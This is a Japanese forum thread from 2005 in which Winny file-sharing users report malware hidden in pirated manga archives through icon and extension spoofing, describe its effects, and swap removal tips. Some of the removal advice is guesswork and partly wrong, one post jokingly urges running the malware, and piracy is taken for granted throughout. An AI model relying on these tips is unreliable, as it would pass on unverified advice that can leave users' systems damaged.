     (ヽ、_,.ゝ、_  ~  ___,ノ ,-、  聞
     )           ノ/`'ー-' <  く
   r'/,   _..   //  l、、、ヽ_) と
    ゝ(_/_ノ´ /ヽ_ノ/  __,l ヽ)_)‐'  い
        {` ーニ[二]‐ク′      い
          〉   /  /_      よ
        /   ´ ̄`ヽ  )
         (____ノ--'

485:[名無し]さん(bin+cue).rar
05/02/15 09:23:17 jiWzC0wC0
DOMは氏ね

486:[名無し]さん(bin+cue).rar
05/02/15 09:44:50 VzTczDct0
うpする人は普段から人一倍気を配って注意してる分、そう簡単に患者側にはならないよ
自分のトリでウィルスばら撒いたら信用失って即引退だしね(まあそうなっても何の損害もないけど)

487:[名無し]さん(bin+cue).rar
05/02/15 11:30:21 Yul6gg5Q0
>>479
avi                                               .exe
だったんだろ

488:[名無し]さん(bin+cue).rar
05/02/15 11:36:54 blJKIUvI0
おれが前に踏んだexeは
avi                                            pugera.exe
こんなかんじだった。

489:[名無し]さん(bin+cue).rar
05/02/15 11:57:46 i5pl1NiQ0
詳細表示で「種類」も表示させとけばいいんじゃないかと思うんだが。
アプリは一発で判るし。

490:[名無し]さん(bin+cue).rar
05/02/15 14:11:50 ARfTjvLW0
ウイルスバスター2005をインストールしようと思うけど、Winnyに影響でないかな~?

491:[名無し]さん(bin+cue).rar
05/02/15 15:08:22 t6NjTp7v0
>>490
スレリンク(download板:587番)

492:[名無し]さん(bin+cue).rar
05/02/15 18:12:13 c0ydgpKA0
>>490
無問題。

493:[名無し]さん(bin+cue).rar
05/02/15 19:17:19 H7+JNsOP0
>>487
いやマジだって(;´Д`)今コピペした「(映画)ショーン・オブ・ザ・デッド - Shaun Of The Dead - (字幕 by アナル男爵).avi」
みんな注意な

494:[名無し]さん(bin+cue).rar
05/02/15 19:39:59 osvcxLY30
無視リスト登録しろ

495:[名無し]さん(bin+cue).rar
05/02/15 19:44:13 hBZa0/080
>>493 ならもう少し詳しく

何で見たのか?関連付けは適切か?スペックが足りないと言う事は無いか?
レジストリエディタは立ち上がるか?タスクマネージャは?
新しくプロセス、ファイルが作られたか?レジストリの値は?

つーかハッシュは?

496:[名無し]さん(bin+cue).rar
05/02/15 19:49:05 80yD0eyp0
釣り禁止。
■━⊂( 。・_・) 彡 ガッ☆`Д´)ノ >>493

497:[名無し]さん(bin+cue).rar
05/02/15 21:27:27 8I7hEyW+0
壁紙ぬるぽウイルスは今のところ壁紙変えられてデスクトップ撮られるだけか・・・。
気持ち悪いな
win.ini検索したけどぬるぽ無し

498:[名無し]さん(bin+cue).rar
05/02/15 21:51:49 0gzfDvM/0
【使用OS】Windows Xp Home
【WindowsUpdateしてるか】最近してない
【使用AntiVirusソフト】ノートンアンチウィルス
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】b7.1
【Winny歴、総DL量】40Gくらい?
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】してない
【症状、具体的に分かる限りすべて書く】画面に「♂♀」がでてあえぎ声がする
【何をしたらそんなことになったのか】zip解凍後「偽装解除.bat」踏んでしまった
【これまでにとった措置】batファイルを踏む前にノートンでスキャンしたものの
脅威なしと出たので実行。上記の症状となりCtrl+alt+Delもきかない状態に。
再起動しても同じ状態になるためセーフモードで実行したところ、通常のような感じ
で起動したが、アプリケーションを起動すると症状発生。

499:[名無し]さん(bin+cue).rar
05/02/15 22:02:03 87AdJQuR0
>>497
撮られたデスクトップの画像はどうなるんだろう・・・?

500:[名無し]さん(bin+cue).rar
05/02/15 22:05:54 4tREr/pA0
うpフォルダに放り込まれるんじゃないの?

501:[名無し]さん(bin+cue).rar
05/02/15 22:12:56 4DsayvfH0
>>498
ギシギシアンアンって対応済みじゃなかったかなぁ~?亜種かなぁー。
batファイルをメモ帳で開いて・・・って思ったけど、batでそこまで
細かい芸当できるのかな。bat(長い空白).exeかもね。

502:[名無し]さん(bin+cue).rar
05/02/15 22:25:56 0gzfDvM/0
>>501
拡張子はbatでした
セーフモードで当該ファイルの拡張子をtxtに変更して開いて見たところ
文字化けして読めませんでした
症状が出る:ブラウザ ノートン jane msconfig
症状が出ない:メモ帳 エクスプローラー
ちなみに落としたファイルは(一般コミック・雑誌)[ジャンプ][2005-12] DEATH NOTE-58でした

503:[名無し]さん(bin+cue).rar
05/02/15 22:49:57 H6JOnBOj0
>>502
俺もそれ、踏んだ。萌える声だよな。
でも、対処法分からん。俺は再インスコした。

で、また、壁紙変わるウイルス踏んで、
今、違う事で大変なんだ。お互い頑張ろう。

504:[名無し]さん(bin+cue).rar
05/02/15 22:54:51 V5T9do2x0
>>503
ワロタ

505:[名無し]さん(bin+cue).rar
05/02/15 23:05:50 0gzfDvM/0
>>503
笑ってる場合じゃないんだけどワロタ

506:[名無し]さん(bin+cue).rar
05/02/15 23:08:24 H6JOnBOj0
俺が感染したのは、>>409に出てた奴だな。

これ、スタートアップに隠しexeファイル出すぞ?
ショートカットを削除後、
(コントロールパネルのプログラムの削除と追加から削除って出るけど、無視して良さげ)
本体である、Adobe Gamma Loader.exeも削除した方が良さそうだ。
それまで、再起動はするなよ。再起動したら、アプリが起動する。

507:ガチンコ初心
05/02/15 23:13:43 ZslCJngn0
【使用OS】Winxp pro SP1
【WindowsUpdateしてるか】昨日した
【使用AntiVirusソフト】ノートン
【AntiVirusをUpdateしてるか】今日した
【ウイルススキャンの結果】ノートンで反応なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量】三年くらい?
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】該当なし?
【症状、具体的に分かる限りすべて書く】
(一般コミック・雑誌) [ジャンプ] [2005-12] DEATH NOTE page.58 「胸中」.zip
sIdxNm06Hv
1cafd7101e4dee38d4a613c95c78c887
の中の326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された
【何をしたらそんなことになったのか】
フォルダアイコン偽装してたのでダブクリ、数十秒で気づいてPC電源断
【これまでにとった措置】
今日作成・変更された怪しいファイル(Documentのなかの~のデスクトップ.bmpとかupなんとか.txt)を削除
nyのキャッシュを全部削除
スタートアップ・レジストリなどを点検

これってなんて言うウイルスでしょうか。また駆除に必要な措置に追加があれば教えてください。

508:507
05/02/15 23:14:36 ZslCJngn0
すいません>>409でガイシュツでした(^^;

509:[名無し]さん(bin+cue).rar
05/02/15 23:20:21 BSZ5eKYk0
おまいら揃いも揃って馬鹿ばっかだな・・。

510:[名無し]さん(bin+cue).rar
05/02/15 23:21:23 0gzfDvM/0
>>509
返す言葉もございません(_ _;)…パタリ

511:[名無し]さん(bin+cue).rar
05/02/15 23:23:19 cIvE0PUr0
俺も壁紙変わる奴踏んじまった
まぁEXEと気づいたから別ドライブに移動させて、ネット切断してから開いたけど
今のところ壁紙変わるのとスクリーンショット撮られる以外不審なところはない
Upフォルダも出来てないし、単なるイタズラファイルかな?

512:[名無し]さん(bin+cue).rar
05/02/15 23:24:30 H6JOnBOj0
俺の>>506の意見は無視ばっかりだな。

513:[名無し]さん(bin+cue).rar
05/02/15 23:25:53 Bx4eUZxM0
>>502
拡張子がbatであろうと、中身はexeかcomだろ
OSに引き渡された時点で、拡張子に関係なく、実行形式であるものは実行される
Windowsなら注意すべき拡張子は
.exe .com .bat .reg .scr .url .htmなど

>>507
497参照。名称は「壁紙ぬるぽ」、melpoとの類似性あり。具体被害は壁紙変更、一部でSS流し。
今後検証してみる

514:[名無し]さん(bin+cue).rar
05/02/15 23:26:20 0gzfDvM/0
>>512
スタートアップ探したんだけどexeもショートカットも見つかりませんでした
現在adobe loaderを検索中です

515:[名無し]さん(bin+cue).rar
05/02/15 23:30:04 ZslCJngn0
>>513
どうもありがとう

516:[名無し]さん(bin+cue).rar
05/02/15 23:33:26 H6JOnBOj0
>>509
グロとかウイルスやexeをわざと押すのが俺の中の流行。

>>514
俺も同じウイルスな筈なんだが、
スタートアップフォルダが2つに増えてたぞ?
で、スタートアップにあるのは、ショートカットだよ。
Adobe Gamma Loader.exeへのショートカット。
隠しファイルを見えるようにしても見えない。
スタートからじゃないと消せない。

俺的対処法

スタートから、全てのプログラムを見る。
スタートアップのショートカットで
Adobe Gamma Loader.exeへのショートカットを見つけたら、
それを右クリックしてプロパティにて本体の場所を確認後、削除。
本体の場所に3つ、実行ファイルとか、テキストがあるので、削除。

ってやってみた。俺、バカだから確証無いよ?

517:[名無し]さん(bin+cue).rar
05/02/15 23:39:57 H6JOnBOj0
なんだか変だな。俺の真似するな。
ちょっと調べるから。

だた、スタートアップのショートカットだけは削除しとけよ~

518:[名無し]さん(bin+cue).rar
05/02/15 23:40:56 cIvE0PUr0
*.exeで検索かけたら随分前からあった形跡のある別のウイルスが発見されたorz

519:[名無し]さん(bin+cue).rar
05/02/15 23:43:02 tSpU2A7o0
私も>>507
>>506の処理一応したけど壁紙以外どういう被害あったのか不明で不安・・

520:[名無し]さん(bin+cue).rar
05/02/15 23:51:29 aRSa9gnM0
フォルダの中のexeを実行しなければ、セーフなんでしょうか?
ちなみに>507のファイルと同じです

521:[名無し]さん(bin+cue).rar
05/02/15 23:51:35 AlE8Na2/0
俺もスタートアップなんもなかったぞ。
同じのじゃないのかも。

522:[名無し]さん(bin+cue).rar
05/02/16 00:01:39 H6JOnBOj0
>>519
あったよな?
デスクトップ撮られたのも削除したし、
これで様子見しておくつもりだが。

>>520
セーフ
見るだけならセーフ。

>>521
色んなのに感染してるとか、怖い事言わないで下さい。
ノートンでスキャンして、
フォルダの中のファイルの数、合ってるか?


523:498=502=505=510=514
05/02/16 00:06:47 T5lKoGkm0
Adobe Gamma Loaderが検索しても見つかりませんでした
adobeで検索して出てくるのはadobe acrobat reader 6.0関係
nyで落としたものが別物なのかなと思って、nyのキャッシュを調べようとしたら
キャッシュフォルダが消えてる...うぅむ

524:[名無し]さん(bin+cue).rar
05/02/16 00:21:19 /i6kkWze0
ちなみに、CドライブのWINDOWSフォルダに
ぬるぽ壁紙がある。まだ懲りないの?.bmpだ。

>>523
同じやつで感染したんだけどな。
特になんともないなら、大丈夫なんじゃないかな?
俺のはPC買い換えたばかりだから、他の感染とか、
考えられないんだけど、あったかもしれないし。
一応報告までって感じだったから…。

525:[名無し]さん(bin+cue).rar
05/02/16 00:21:24 SViFvfGG0
>>522
スタートアップにありました。消しました。
けれどデスクトップをとられたものはどこにあるんですか??
本体の場所の3つのexeとかtxtは消しました

526:[名無し]さん(bin+cue).rar
05/02/16 00:23:59 /i6kkWze0
>>525
マイ ドキュメントにある筈だよ。
なんか、>>507を見ると、他にもありそうだから、確認してくれ。
俺はマイドキュメントに撮られてのが一枚あっただけだから。
俺寝るわ。おやちゅみ♥

527:[名無し]さん(bin+cue).rar
05/02/16 00:24:10 /4iS+1Vf0
Adobe Gamma Loader.exeってAdobe製品を入れたときに出来る奴じゃないの?

C:\Documents and Settings\All Users\スタート メニュー\Adobe Gamma Loader.exe
C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe

でしょ?

528:[名無し]さん(bin+cue).rar
05/02/16 00:28:23 S0hy97P40
>527
ウイルスが私はウイルスですって書いてあるファイル名だとしたら
かなり、やさしいウイルスだな

529:521
05/02/16 00:31:08 E2b3+tBw0
脅かすだけのイタズラで問題なしって結論にしとく。

530:[名無し]さん(bin+cue).rar
05/02/16 00:33:19 /i6kkWze0
>>527
解凍ソフトを利用してスタートアップに
exeフォルダを隠すってウイルスがあるから、それだと思った。
アプリ自体、正規でも、それを利用されて画面を撮られたりすると思ったんだが。

俺の勘違いだったら、すまない。
実行した方は、adobe製品をコントロールパネルから削除したのち、再インコしてくれ。
それで問題は解決すると思うんだが。

531:[名無し]さん(bin+cue).rar
05/02/16 00:42:17 YcGtu7I30
>>526
ありがとうございます
マイドキュメントにありました


532:[名無し]さん(bin+cue).rar
05/02/16 01:03:23 MUkT2LHD0
このスレでさ
Winnyをよく使用しててそれでも一年ぐらいウイルスに
かかってない猛者っていないよな?

533:[名無し]さん(bin+cue).rar
05/02/16 01:06:21 l2S21LjF0
2年ほど使っているが俺は一度も感染していない。
まあ、このスレをよく見ているのおかげだが。

534:[名無し]さん(bin+cue).rar
05/02/16 01:10:52 x8e+VWk+0
>>529
遅効性だったらどうするんだ。

535:[名無し]さん(bin+cue).rar
05/02/16 01:12:43 FCU/634p0
>>507の踏んだあとウイルス検索したけど何もでないことってありますか?

536:[名無し]さん(bin+cue).rar
05/02/16 01:16:37 0Pev5+JK0
>>535
どう思いますか?

537:[名無し]さん(bin+cue).rar
05/02/16 01:17:46 KMF/Fpbn0
うちの場合は~のデスクトップ.bmpはデスクトップにできてたなあ。
あとAdobe Gamma Loaderだけど、うちはスタートアップには何もできてなかった。

検索すると、"Adobe Gamma Loader.lnkCommon Startup"ってファイルが見つかったけど
これは多分うちの場合は以前から、msconfigで
スタートアップからAdobe Gamma Loaderを消してたので、それの退避ファイル?なのかな。
そこらへんから見ると多分Adobe Gamma Loaderはシロっぽいけど。

送信パケットとか見る分には今のとこは特に悪さはしてない風だけど、
遅効性ってことはあるのはあるのかもねー、あーこわ。

538:[名無し]さん(bin+cue).rar
05/02/16 01:18:03 ABE/vpxo0
>>532
猛者って・・・感染しない奴の方が多いんじゃねーか?

539:498
05/02/16 01:27:36 T5lKoGkm0
>>530
違うウィルスなのかなぁ
>>507には「326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された」
ってなってるけど、私の場合ほぼ同名のzipファイルを解凍したら「偽装解除.bat」と
10個くらいの不明ファイルが出てきて、この「偽装解除.bat」を実行したら画面の真ん中に
「♂♀」だけ出て、あとはあえぎ声だったんです
「まだ懲りないの?.bmp」も「adobe gamma loader」も見つからないし...

540:[名無し]さん(bin+cue).rar
05/02/16 01:33:12 E2b3+tBw0
>>534
その時はその時でなんとかする。

541:[名無し]さん(bin+cue).rar
05/02/16 01:43:27 hi46Oqqx0
>>536
検索する前にexeとかを削除したんですが、
その後ウイルス検索しても何もでないけど
bmpとかは残ってるので消えてないのかなと思いました。

IDかわってるかもだけど私>>535です。

542:[名無し]さん(bin+cue).rar
05/02/16 02:05:18 UqvjmDUi0
Adobe Gamma Loader.exe
URLリンク(www.google.com)

見る限りでは何でもないファイル、もう手っ取り早くぁゃιぃプロセスと親ファイル晒せ
URLリンク(www.geocities.jp)

543:[名無し]さん(bin+cue).rar
05/02/16 02:43:19 /cUh2MQW0
ny使いかどうかは別にして、感染なんかするほうがどうかしてるぞ

544:[名無し]さん(bin+cue).rar
05/02/16 02:47:33 cNq7VYDw0
バカばっか

545:[名無し]さん(bin+cue).rar
05/02/16 02:55:48 hSSYpnE60
私も以前は引っかかる香具師は馬鹿中の馬鹿
そう思っていたのに…
昨日は天誅殺か大殺界?みたいなもんですかねw

546:[名無し]さん(bin+cue).rar
05/02/16 03:23:14 XFgx84Yk0
>>545
  ,j;;;;;j,. ---一、 `  ―--‐、_ l;;;;;;
 {;;;;;;ゝ T辷iフ i    f'辷jァ  !i;;;;;  ウイルスに感染する香具師は馬鹿中の馬鹿
  ヾ;;;ハ    ノ       .::!lリ;;r゙
   `Z;i   〈.,_..,.      ノ;;;;;;;;>  そんなふうに考えていた時期が
   ,;ぇハ、 、_,.ー-、_',.    ,f゙: Y;;f.   俺にもありました
   ~''戈ヽ   `二´    r'´:::. `!


547:[名無し]さん(bin+cue).rar
05/02/16 03:25:10 7kkNXfcC0
それ、流行るな

548:409
05/02/16 04:07:23 D/u62stz0
>>409です・・・
OS再インスコするとは言ったものの、時間が無くてバックアップしかしてません。
ログ読んでみるとSS保存、壁紙変更以外に活動してる様子は無いみたいですね。
SSの保存場所は多少違いがあるみたいですけど、同じexeですよね?
(俺の場合、フォルダ名をマイドキュメントから変更していたためかデスクトップに保存されてた)
実害もないことだし、取り敢えず様子見ます。
ていうか、踏んだ人意外と多いのね・・・

>>546
俺にもありました

549:[名無し]さん(bin+cue).rar
05/02/16 04:11:41 MUkT2LHD0
みなさん
今までWinnyで落としたデータやコンテンツ
を金額で換算するとどれぐらいになる?
俺は10万いったくさい

550:409
05/02/16 04:16:44 D/u62stz0
ny歴2年。 
こないだまで鉄壁君だったけど、UperOOniseのファイルで
うっかりexe踏んだ。一度やってみなよ。 
初回のみだけど、デスクトップのSSを撮って貰える。 
ビビるだけビビって削除せずに放置することもできるし、思い切って
.exeで検索かけてしまえばわりと何も出ない。 
不安ならOSクリーンインストールすればいいだけ。暇つぶしになる。 
遅効性だったときのスリルとか色々あるのでマジでお勧め。

551:507
05/02/16 05:16:56 lDpPZbwW0
俺は「お気に入り」にある「Tips-Winny」フォルダに新規のUpFolder.txtがあり
そこ自身だけを指定してありました。
おそらくWinnyと名前の付いたフォルダを見つけると目クラで上書きするので
運が悪い場合のみUpFolder.txtを上書きされてしまうんだと思います。
(別のドライブにWinny2フォルダがあったけど無事)
なんとなく稚拙な新種でそう高度な事はされてない気がします。
踏んでおいてナンですがw

552:[名無し]さん(bin+cue).rar
05/02/16 06:19:56 11Ht2S4t0
Lが死んだとか聞いてあせって開こうとして踏んでしまったよ

553:[名無し]さん(bin+cue).rar
05/02/16 06:59:12 FqPnyqgM0
二つファイル落としてデスノートの「二択」と「胸中」だったんだけど
ウィルスバスター反応しないし、「二択」読んだ後だったから
安心と早く次読みたいっていうのでダブクリしちゃったんだよね。
フォルダ開いたら.Tumbがあっておかしいと思ったがその時にはもうクリックしちゃってた。

554:[名無し]さん(bin+cue).rar
05/02/16 08:09:40 0Pev5+JK0
>>552-553
だからなんだと言うんだ


555:[名無し]さん(bin+cue).rar
05/02/16 08:34:22 A4Is3sXe0
>>498
って既出のウイルス?
とりあえずC\windows\system32 の中にコピーされたと思う本体を消したらギシアンは消えたけど、アプリは起動できず。
対処法が合ったらお願いしたいのですが。
ちなみにnyで拾った友人に渡された被害者です。 _| ̄|○

556:[名無し]さん(bin+cue).rar
05/02/16 08:38:24 u99klNFJ0
だからここは質問・救済スレじゃない、と何度言ったらわかるんだー

557:[名無し]さん(bin+cue).rar
05/02/16 08:42:54 A4Is3sXe0
すまん。
どこで聞けばよいの? ウイルス関係乱立してわかんないよ(つД`)

558:[名無し]さん(bin+cue).rar
05/02/16 09:55:27 x8e+VWk+0
そのような便利なスレはございません。
セキュ板いってもAntinnyなんて相手にされんだろ。

筋から言えばその友人になんとかしてもらえ。

559:[名無し]さん(bin+cue).rar
05/02/16 10:06:04 DHKBfESF0
まあテンプレ読んで対処できないなら初期化&新規インスコだ。
自分で拾おうが友達から渡されようが、自分のマシンで自分が実行
したなら自業自得ってことだし。

560:[名無し]さん(bin+cue).rar
05/02/16 10:11:38 11Ht2S4t0
救済スレじゃなかったんだ。今知った


561:498
05/02/16 10:40:36 T5lKoGkm0
>>555
system32にあった「taskmen.exe」ってのがそうなんですかね
「作成日時:2005年2月15日13:07:44」ってなってるし
とりあえず削除してみたところ、同じようにギシアンは消えましたが
アプリケーションを起動しようとすると「ファイルを開くプログラムを選択してください」
が出てきます
\(||_ _)/ オテアゲ

562:[名無し]さん(bin+cue).rar
05/02/16 10:53:13 UR3Ruuo40
スレ進んでると思ったら・・・、何ですかこの狂態は

563:[名無し]さん(bin+cue).rar
05/02/16 11:09:08 99ye/hfF0
Whiterみたいにもっと致命的なウイルスだったら、書き込みすら
できなくて静かなんだろうがな。

564:[名無し]さん(bin+cue).rar
05/02/16 11:13:15 MISjc2zq0
>>560
だってウィルスにかからないように注意してる人たちが集まるスレだもん。

565:498
05/02/16 11:16:16 T5lKoGkm0
なまじ動くもんだから、何とかなるんじゃないかとじたばたしてます
ちなみに書き込みはサブノートから

566:498
05/02/16 11:24:43 T5lKoGkm0
taskmen.exeを削除する前
[通常起動」→windows画普通に起動し(壁紙も普通)常駐アプリが起動するときに発症
「セーフモード」→アプリケーションを起動すると発症(エクスプローラー、ノートパッドなどは発症せず)

taskmen.exeを削除したあと
アプリケーションを起動すると「ファイルを開くプログラムを選択してください」が出る

ていう感じなので、exeを実行する部分の何かが書きかえられちゃったのかな?
そのうち誰かが解析してくれるのをのんびり待つことにします

567:[名無し]さん(bin+cue).rar
05/02/16 11:41:08 fuFhnYJH0
>>566
ウイルスが何をするのかは解析されるだろうけど、復旧手順は期待
するなよ。解析の過程で副産物として出てくることはあるけどね。
関連付けがおかしくなったせいだろうから、そのへんをチェック。

568:498
05/02/16 11:59:26 T5lKoGkm0
>>567
「ファイルとexeの関連付け」はいくつかチェックしてみたけれど
特に問題なさそうでした(サブノートと比較した)
エクスプローラーは使えるので、必要なファイルとかは外付けHDDに
移せばまぁ再インストールでもしょうがないかなぁと思ってます
外付けHDDが容量厳しくなってるのでまず整理しなきゃならないので
いずれにせよしばらくはサブノートでのんびり行きます
exeが使えればDVD-Rに焼けるのになぁ

569:[名無し]さん(bin+cue).rar
05/02/16 12:26:23 B76HR7js0
フォルダ偽装は忘れたころに踏んじゃう(*´Д`)

570:[名無し]さん(bin+cue).rar
05/02/16 13:30:52 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば

 ぬるぽ.avi                                                .exe
  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。

571:[名無し]さん(bin+cue).rar
05/02/16 13:32:01 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば

 ぬるぽ.avi                                                .exe
  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。

572:[名無し]さん(bin+cue).rar
05/02/16 13:33:41 oDxgolZA0
だからフォルダ表示を変更しておけって。
うちは2000だから、もともと無問題だが。

573:[名無し]さん(bin+cue).rar
05/02/16 13:31:54 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば

 ぬるぽ.avi                                                .exe
  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。

574:[名無し]さん(bin+cue).rar
05/02/16 13:41:10 dgi/UPzf0
すっかり498の日記帳になったな

575:[名無し]さん(bin+cue).rar
05/02/16 13:42:42 dgi/UPzf0
ここは498の日記帳になったようだな

576:555
05/02/16 13:44:50 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。

577:555
05/02/16 13:45:24 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。

578:[名無し]さん(bin+cue).rar
05/02/16 13:46:57 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。

579:555
05/02/16 13:48:06 A4Is3sXe0
多重カキコスマン

580:[名無し]さん(bin+cue).rar
05/02/16 13:54:48 d4WhvpXs0
一時ダウソ板がおかしかったからな

581:[名無し]さん(bin+cue).rar
05/02/16 13:57:15 cwJo8nW70
赤いめがねのCGのウイルスかかったのですが
どうしたらいいですか?やっぱりOSインスコですか?
他に何かあるの?

582:[名無し]さん(bin+cue).rar
05/02/16 14:01:02 /SfQnaHt0
解決するまで498にのんびりできる日々はこない

583:498
05/02/16 14:01:20 T5lKoGkm0
>>576
みてるみてる
アプリが使えるようなら、DVD-Rに退避して再インストールの方向で検討します
ワームみたいにほかのファイルに転移するのか不明なのでそれを確認してからかな?
何となくほかのファイルは無事な気がするけど

584:555
05/02/16 14:12:43 A4Is3sXe0
今見たらexeに関するレジストリは無事だったんだよね。
HKEY_CLASSES_ROOT -> .exe
の部分だけど。
最インスコした方が早いかなぁ?

585:[名無し]さん(bin+cue).rar
05/02/16 14:14:31 A8cLyt/t0
平穏だったのに
ウイルス踏んだ厨が居座って盛り上がってますねw

解析する力も気もないなら
ケーブル切って素直に再インストールしとけ。

586:[名無し]さん(bin+cue).rar
05/02/16 14:23:15 11Ht2S4t0
エラソ・・・


587:[名無し]さん(bin+cue).rar
05/02/16 14:29:40 8u5kWtwR0
普通の反応と思うけど

588:[名無し]さん(bin+cue).rar
05/02/16 14:31:25 oDxgolZA0
>>1の1行目も読まずに厚顔無恥な質問してくるほうが、えらそうと
いうか傍若無人というか。

589:[名無し]さん(bin+cue).rar
05/02/16 14:33:05 cNq7VYDw0
エラソもなにもココはそーいったスレじゃね?
>>1の1行目すら読まないヴォケはニュイルス踏んで滅んでしまへ

590:[名無し]さん(bin+cue).rar
05/02/16 14:45:13 T5lKoGkm0
>>588>>589
あ~ごめん
ぜんぜん読んでませんでした
もう出てきませんので許してください

591:[名無し]さん(bin+cue).rar
05/02/16 14:52:52 EacPUhRQ0
雑誌の立ち読みしただけなので記憶があやふやだけど
拡張子ごとに色を変える方法があったような…
exeやcomが赤く表示できれば引っかからないんだが

592:[名無し]さん(bin+cue).rar
05/02/16 15:09:06 jcwssrC/0
>591
詳細表示で「ファイルの種類」も表示させればいいじゃん。

593:[名無し]さん(bin+cue).rar
05/02/16 15:14:30 A8cLyt/t0
>>591
>>5
>・アイコン偽装したexeを見分けるため、
> フォルダ・txt・aviなど偽装されやすい拡張子は標準アイコンから変更しておく。
なヨカーン。

違うとしても少なくともこの方法でアイコンを標準と明らかに違うのを使えば誤って踏むことはない。


594:[名無し]さん(bin+cue).rar
05/02/16 15:25:50 ZboJx+CZ0
Winnyウイルスをなぜ踏むのかランキング

1、抜ける画像、エロゲーの前に興奮してついつい即解凍、即クリック
2、ほしかった画像、ゲーム、データの前に興奮してついつい即解凍、即クリック
3、チェックしてもひっかからなかった。

最近はウイルスチェックをいちいちめんどくさがる人もいます、でもよく考え
てください。チェックにかける時間と、かかったあとに駆除処理をする時間を・・
比べてください。

あと落としたデータの属性と中身を考えましょう。
コミック、同人誌、などの書物のデータなら
解凍したあと、フォルダの中身にJPEG イメージなどがあるはずです、
それもページ数相応に、あきらかにフォルダの中に、よくわからんフォルダ
があったり、bmpファイルがあったり(漫画類でbmpはほとんどありえない)、
JPEGが数個しかなかったり、あきらかに怪しいので、注意しましょう。

解凍ソフトは中身がみれるRARなどがお勧めです、ただ解凍前にチェック
するのも忘れずに。

595:[名無し]さん(bin+cue).rar
05/02/16 16:01:05 om6x2Fgw0
たしか>>507みたいな奴で中のフォルダをダブルクリックしたけど
何も起こらなかった その後スキャンしても関係ないトロヤンがあっただけ

596:[名無し]さん(bin+cue).rar
05/02/16 17:07:24 1RSiFY+c0
面白いウィルスがあると聞いて飛んできました

初心者の頃このスレにお世話になったなぁ
今となってはおそらく当分お世話になることはないだろうけど

597:[名無し]さん(bin+cue).rar
05/02/16 18:02:46 U+44562u0
ファイラー使ってないやつ、多いんだな・・・。

598:[名無し]さん(bin+cue).rar
05/02/16 18:19:45 gB55GAf20
>>590
もうみてないかもしらんが
www.symantec.com/region/jp/sarcj/data/t/tool.to.reset.shellopencommand.registry.keys.html
を入れたらなおったっぽい
たぶん

599:555
05/02/16 18:44:33 A4Is3sXe0
>>598
神! 神! 神!
つまりこのウイルスの駆除方法は
セーフモードで C\windows/system32 の中の taskmen.exe を削除後に>>598 をインスコでとりあえず通常の状態には戻るのかな?
他にどんな効果があるのかわからないのが怖いが。


600:[名無し]さん(bin+cue).rar
05/02/16 18:46:02 A4Is3sXe0
あ、でもまだスタートからシャットダウンがないのとCtrl + ALT + Del からシャットダウンが選択できないなぁ。

601:[名無し]さん(bin+cue).rar
05/02/16 18:46:11 1RSiFY+c0
待っていればそのうちノートン先生がちゃんとしたパッチ出してくれると思うけどね

602:[名無し]さん(bin+cue).rar
05/02/16 18:50:45 nFrqc8/G0
【使用OS】ME
【WindowsUpdateしてるか】している
【使用AntiVirusソフト】ウイルスバスター2004
【AntiVirusをUpdateしてるか】している
【ウイルススキャンの結果】
17件ヒット
種類   ウイルス名      感染元                              ウイルス検出時の処理    ウイルス駆除
ファイル WORM_ANTINNY.A  A0900358.CPY (C:\_RESTORE\ARCHIVE\FS179.CAB) 隔離できません
